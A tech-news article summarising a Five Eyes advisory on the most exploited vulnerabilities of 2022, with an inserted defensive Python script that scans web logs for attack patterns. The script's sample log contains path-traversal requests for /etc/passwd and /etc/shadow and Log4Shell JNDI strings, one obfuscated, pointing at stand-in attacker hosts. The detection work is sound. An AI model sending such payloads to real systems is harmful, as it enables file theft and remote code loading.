Five Eyes intelligence agencies disclose the 12 top-exploited vulnerabilities of 2022

Alfonso Maruccia

In context: The Five Eyes (FVEY) alliance is an intelligence-sharing partnership among Australia, Canada, New Zealand, the United Kingdom, and the United States. In the past it was best known for the Echelon signals-intelligence program. Today its member agencies also publish joint cybersecurity advisories, including lists of the software vulnerabilities they see exploited most often.

We live in a software-filled world, and that software is riddled with dangerous security vulnerabilities ready to be exploited by cybercriminals or state-sponsored hackers. A newly released advisory coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the NSA, and the FBI, together with the cybersecurity agencies of the other Five Eyes countries, reveals the top exploited vulnerabilities of 2022.

The advisory lists the Common Vulnerabilities and Exposures (CVE) identifiers that were routinely and frequently exploited by criminals and state-backed hackers. According to the advisory, in 2022 malicious cyber actors exploited older, well-known software vulnerabilities more frequently than recently disclosed ones, and they targeted unpatched, internet-facing systems. One reason the advisory gives is that proof-of-concept exploit code was publicly available for many of the listed flaws, which lowers the bar for a broader range of attackers.

The first entry on the list is CVE-2018-13379, a path traversal vulnerability in the SSL VPN web portal of Fortinet FortiOS that was already among the most exploited flaws in 2020 and 2021. It lets an unauthenticated attacker download system files via specially crafted HTTP requests. Its continued exploitation indicates that many organizations fail to patch software in a timely manner, the advisory says.

Also on the 2022 list are the three Microsoft Exchange Server vulnerabilities that are chained together as ProxyShell (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523), Log4Shell (CVE-2021-44228) in the Apache Log4j library, and several remote code execution (RCE) flaws in other widely deployed products. Microsoft products account for more entries than any other vendor's. In addition to the top 12, the advisory lists 30 further CVEs that were also routinely exploited in 2022 to compromise organizations and government agencies.
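The two flaws singled out above share a trait defenders can act on: the Fortinet bug is triggered by a crafted HTTP request carrying a directory-traversal sequence, and Log4Shell is triggered by a `${jndi:...}` lookup string arriving in any logged header. The Python script below is an added example, not code from the advisory or the article: it scans constructed web-access-log lines (the hosts, paths and addresses are invented) for both patterns, decoding URL encoding repeatedly so double-encoded traversal is caught, and unwrapping the `${lower:x}`, `${upper:x}` and `${::-x}` tricks used to disguise JNDI lookups. The log format, field names and regular expressions are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format. They are synthetic (not taken
# from the advisory, the article, or any real device); paths, hosts and the
# 198.51.100.0/24 and 203.0.113.0/24 addresses (documentation ranges) are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2022:10:01:02 +0000] "GET /vpn/login?lang=en HTTP/1.1" 200 1183 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2022:10:01:09 +0000] "GET /vpn/lang?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.7 - - [12/Mar/2022:10:01:15 +0000] "GET /vpn/lang?file=..%252F..%252F..%252Fetc%252Fshadow HTTP/1.1" 403 512 "-" "curl/7.79.1"
203.0.113.9 - - [12/Mar/2022:10:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"
203.0.113.9 - - [12/Mar/2022:10:02:41 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:rmi://198.51.100.10:1099/b}"
203.0.113.5 - - [12/Mar/2022:10:03:00 +0000] "POST /vpn/login HTTP/1.1" 302 0 "https://vpn.example.test/vpn/login" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# ".." as a whole path segment, i.e. at the start or after / = & ? and followed by / or end.
TRAVERSAL_RE = re.compile(r'(?:^|[/=&?])\.\.(?:/|$)')
# The Log4j lookup prefix that Log4Shell abuses.
JNDI_RE = re.compile(r'\$\{jndi:')
# Wrappers commonly used to hide "jndi": ${lower:j}, ${upper:J}, ${::-j}.
LOOKUP_OBFUSCATION_RE = re.compile(r'\$\{(?:(?:lower|upper):|::-)([^${}]*)\}', re.IGNORECASE)


def normalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly (catches double encoding), strip the lookup
    wrappers above, fold backslashes to slashes and lowercase. The loop is
    bounded so hostile input cannot keep it spinning."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        decoded = LOOKUP_OBFUSCATION_RE.sub(r'\1', decoded)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\', '/').lower()


def classify(line: str):
    """Return (ip, target, tags) for a parsable line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = []
    if TRAVERSAL_RE.search(normalize(m['target'])):
        tags.append('path_traversal')
    # A JNDI lookup fires wherever the application logs the string, so check
    # every attacker-controlled field we have, not only the request target.
    for field in (m['ua'], m['referer'], m['target']):
        if JNDI_RE.search(normalize(field)):
            tags.append('jndi_lookup')
            break
    return m['ip'], m['target'], tags


def scan(log_text: str):
    """Return one finding per flagged line: line number, source IP, raw target, tags."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        parsed = classify(line)
        if parsed and parsed[2]:
            ip, target, tags = parsed
            findings.append({'line': n, 'ip': ip, 'target': target, 'tags': tags})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {','.join(f['tags'])} {f['target']}")
```

Run against the sample, the script flags lines 2 and 3 as path traversal (line 3 only after the second decoding pass) and lines 4 and 5 as JNDI lookups, and leaves the two benign requests alone. The obfuscation list is deliberately short; Log4j supports further lookups (`${env:...}`, `${date:...}` and others) that real evasions combine, so in production this belongs behind an engine that tracks the full lookup grammar rather than a handful of regexes.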

The joint advisory is more than a list of exploited vulnerabilities: it also gives advice, with "strong" encouragement, on security practices for vendors, designers, developers, and end-user organizations. Software companies should adopt a secure-by-design approach to development so that fewer vulnerabilities ship in the first place, the advisory says.

End-user organizations are advised to apply patches promptly after they are released. They should also use security tools such as antivirus and antimalware services, web application firewalls, and network protocol analyzers, and ask their software providers to explain how they plan to improve the security of their products.
